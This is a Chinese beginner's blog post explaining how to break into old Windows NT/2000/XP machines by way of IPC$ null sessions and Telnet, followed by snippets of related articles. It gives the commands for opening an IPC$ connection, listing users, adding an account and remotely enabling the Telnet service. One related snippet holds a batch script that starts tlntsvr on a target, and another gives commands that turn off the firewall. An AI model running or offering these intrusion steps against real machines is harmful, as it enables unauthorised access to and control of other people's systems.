ipc$+telnet远程攻击

原创 2015年11月20日 21:24:39

1.ipc$连接的条件

条件:(1)对方机器开了ipc$共享

2)需要对方机器开启139445端口支持

3)系统只有nt/2000/xp才可以相互建立ipc$连接

4)需要知道对方机器的ip

5)双方都需要启动了Lanmanworkstation服务

Ipc$在操作时系统日志会留下操作记录

 

2.ipc$空链接

命令:net use \\ip地址\ipc$"" /user:""

无法进行任何管理操作

可以做:1.查看远程主机的共享资源

2.查看远程主机的当前时间

3.得到远程主机的 NetBIOS 用户名列表

非空链接命令:net use \\ip地址\ipc$密码 /user:”用户名”

 

3.获取远程机用户列表

命令:nbtstat -A ip地址、net user

 


4.利用telnet登录远程机器,创建用户

命令:net user 用户名 密码 /add

Telnet入侵:1.建立ipc$连接


2.开启远程主机中禁用的telnet服务

3.断开ipc$连接,开始Telnet远程控制



telnet登录过程

 

 

查看远程主机的共享资源和创建用户

 

 

查看创建后系统内用户情况


本人也是初学者,还请各位大神们指教~


内网渗透之IPC,远程执行

开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" ...
  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:48
  • 3727

IPC$局域网入侵详解

PC$命令详解  网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文...
  • dalu007
  • dalu007
  • 2005年02月26日 14:14
  • 6991

ipc telnet 攻击

ping %1 -n 2net use \\%1sc \\%1 config tlntsvr start= autosc \\%1 start tlntsvrtelnet %1
  • mmyzlinyingjie
  • mmyzlinyingjie
  • 2014年03月18日 16:47
  • 386

Linux ShellCode远程攻击原理

这里就以exit 系统调用为例 首先编写C代码,在GDB中使用 disass _exit 反汇编exit 函数,之后迁移为汇编代码。 section .text global _start _...
  • X_White
  • X_White
  • 2013年02月27日 23:29
  • 1324

JSP SHELL有关的whoami漏洞

前一段时间项目被检测出漏洞,经排查是由于weblogic的弱口令的的缘故,造成攻击者通过weblogic控制台上传woami.war,窃取我们数据库信息 解决方案:   1、加强weblogic口...
  • OXiaoMianYiJiu
  • OXiaoMianYiJiu
  • 2016年01月22日 17:26
  • 1437

利用pipe执行远程机器命令的分析

标题:流光附带工具实现分析lcx    作者: Nemesis  当大家用流光发现一个空口令的administrator账户时,自然马上就会用 流光带的NTCMD.EXE在远程机器上执行命令。但是,大...
  • liswa
  • liswa
  • 2005年03月09日 14:44
  • 2121

windows IPC$ telnet 注册表 入侵

一. IPC$入侵  条件:能ping通对方的主机, 有对方的一个用户而且这个用户必须有密码            连接:net  use  \\192.168.0.2            ...
  • mmyzlinyingjie
  • mmyzlinyingjie
  • 2014年03月18日 16:46
  • 286

海思芯片 IPC_HI3518的解读

在大学中没有怎么接触过makefile的东西,再看了书籍之后开始看了第一个makefile,就是海思芯片IPC_HI3518的makefile。十分的长,在开始入手的时候对于我来说真的是太难了。然后我...
  • iosxiaoming
  • iosxiaoming
  • 2015年08月19日 20:21
  • 2384

(转)使用 Boost 的 IPC

使用非常流行的 Boost 库进行并发编程非常有意思。Boost 有几个用于并发编程领域的库:Interprocess (IPC) 库用于实现共享内存、内存映射的 I/O 和消息队列;Thread 库...
  • caoli98033
  • caoli98033
  • 2015年03月20日 16:59
  • 410

chrome之ipc

上来就被这个复杂的define给搞迷糊了,看了http://www.cnblogs.com/duguguiyu/archive/2008/10/04/1303695.html的解释,在对照就好多了,不...
  • tompaz
  • tompaz
  • 2011年06月07日 14:59
  • 3469
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:ipc$+telnet远程攻击
举报原因:
原因补充:

(最多只允许输入30个字)